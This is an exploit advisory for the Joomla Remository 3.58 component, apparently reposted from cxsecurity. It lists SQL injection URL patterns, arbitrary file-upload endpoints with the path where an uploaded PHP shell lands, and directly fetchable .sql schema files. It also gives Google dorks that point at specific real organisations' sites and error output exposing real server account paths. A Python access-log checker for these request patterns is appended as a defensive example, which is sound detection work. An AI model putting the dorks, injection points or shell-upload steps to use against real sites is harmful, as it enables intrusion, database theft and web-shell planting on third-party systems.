Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Backdoor Access

2019.01.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

####################################################################

# Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : remository.com
# Software Download Link : remository.com/downloads/joomla-3.x-software/
# Software Information Link : extensions.joomla.org/extension/remository/
# Software Version : 3.58
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_remository''
inurl:''/administrator/components/com_remository/''
intext:Site Designed By Conservation Designs
intext:CCCV Gabriel Valencia site:gob.ec
intext:Web creada por softdream.es
intext:Sponsored by Innovatron - Managed by Spirtech
intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
intext:Web design by Mercury Web Solutions
intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
“Remository” is open source software for Joomla.

####################################################################

# Impact :
***********
* Attackers can exploit this issue via a browser. The 'com_remository' component for Joomla! is prone to an arbitrary file upload (shell upload) vulnerability because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

* An attacker might be able to inject into and/or alter existing SQL statements, which would influence the database exchange.

* Joomla Remository Components 3.58 is vulnerable to SQL injection because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read and write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_remository&Itemid=[SQL Injection]

/index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[ID-NUMBER]&orderby=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=[ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]

####################################################################

# Arbitrary File Upload Exploit :
****************************
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles

/index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]

/index.php/shared-file-repository/func-addmanyfiles/

Directory File Path :
******************
Search for your file here.

/components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php

/components/com_remository_files/......

Note : If the website is not vulnerable, it says:

You have no permitted upload categories - please refer to the webmaster

####################################################################

# Database Disclosure Exploit :
***************************
/administrator/components/com_remository/assignment.sql

/administrator/components/com_remository/blob.sql

/administrator/components/com_remository/containers.sql

/administrator/components/com_remository/file.sql

/administrator/components/com_remository/log.sql

/administrator/components/com_remository/permission.sql

/administrator/components/com_remository/repository.sql

/administrator/components/com_remository/reviews.sql

/administrator/components/com_remository/structure.sql

/administrator/components/com_remository/text.sql

####################################################################

# Example Vulnerable Sites :
*************************

####################################################################

# SQL Database Error :
*********************
Strict Standards: Non-static method JLoader::import() should not be called statically in /home/elsemillero/public_html/nuevo/libraries/joomla/import.php on line 29

Deprecated: Assigning the return value of new by reference is deprecated in /home/epangsof/public_html/includes/joomla.php on line 836

Warning: Cannot modify header information - headers already sent by (output started at /home/epangsof/public_html/includes/joomla.php:836) in /home/epangsof/public_html/includes/joomla.php on line 697

Fatal error: Uncaught Error: Call to undefined function set_magic_quotes_runtime() in /home4/hbman23/public_html/main/includes/framework.php:21 Stack trace: #0 /home4/hbman23/public_html/main/index.php(22): require_once() #1 {main} thrown in /home4/hbman23/public_html/main/includes/framework.php on line 21

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
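A log check that a site operator could run for the request patterns listed in this advisory, as an added example that is not part of the original advisory or of the Remository project. Treating the listed parameters as integers is an assumption drawn from the advisory's [ID-NUMBER] placeholders, the finding names are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory lists as injection points; expecting integers here is
# an assumption based on its [ID-NUMBER] placeholders.
INT_PARAMS = ("Itemid", "id", "cat", "orderby", "page", "no_html")
UPLOAD_FUNCS = {"addfile", "addmanyfiles"}
SQL_FILE = re.compile(r"/administrator/components/com_remository/[^/]+\.sql$", re.I)
UPLOADED_PHP = re.compile(r"/components/com_remository_files/.+\.ph(p\d?|tml)$", re.I)
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return the findings for one combined-format access-log line."""
    m = LOG_LINE.search(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    query = parse_qs(url.query, keep_blank_values=True)  # also decodes %27 etc.
    findings = []
    if SQL_FILE.search(url.path) and m["status"] == "200":
        findings.append("sql-file-served")       # schema file reachable over HTTP
    if UPLOADED_PHP.search(url.path):
        findings.append("php-in-upload-dir")     # script requested from upload dir
    if "com_remository" in query.get("option", []):
        for name in INT_PARAMS:
            if any(not re.fullmatch(r"[0-9]+", v) for v in query.get(name, [])):
                findings.append("non-numeric-" + name)
        if UPLOAD_FUNCS & set(query.get("func", [])):
            findings.append("upload-form-" + m["method"])
    return findings

# Constructed sample lines (documentation-range addresses, no real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jan/2019:10:00:00 +0000] "GET /index.php?option=com_remository&Itemid=78&func=fileinfo&id=40%27 HTTP/1.1" 500 512',
    '203.0.113.5 - - [30/Jan/2019:10:00:05 +0000] "GET /administrator/components/com_remository/repository.sql HTTP/1.1" 200 20480',
    '198.51.100.7 - - [30/Jan/2019:10:01:00 +0000] "POST /index.php?option=com_remository&Itemid=28&func=addfile HTTP/1.1" 200 900',
    '198.51.100.7 - - [30/Jan/2019:10:01:09 +0000] "GET /components/com_remository_files/file_image_12/8841shell.php HTTP/1.1" 200 15',
    '192.0.2.9 - - [30/Jan/2019:10:02:00 +0000] "GET /index.php?option=com_remository&Itemid=60&func=select&id=3 HTTP/1.1" 200 4096',
]

def scan(lines):
    """Map line index -> findings, for the lines that have any."""
    return {i: f for i, f in enumerate(map(classify, lines)) if f}

if __name__ == "__main__":
    for index, found in scan(SAMPLE_LOG).items():
        print(index, found)
```

The check covers only query-string URLs; the search-engine-friendly form `/index.php/shared-file-repository/func-addmanyfiles/` would need a path rule of its own.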



Copyright 2024, cxsecurity.com

 
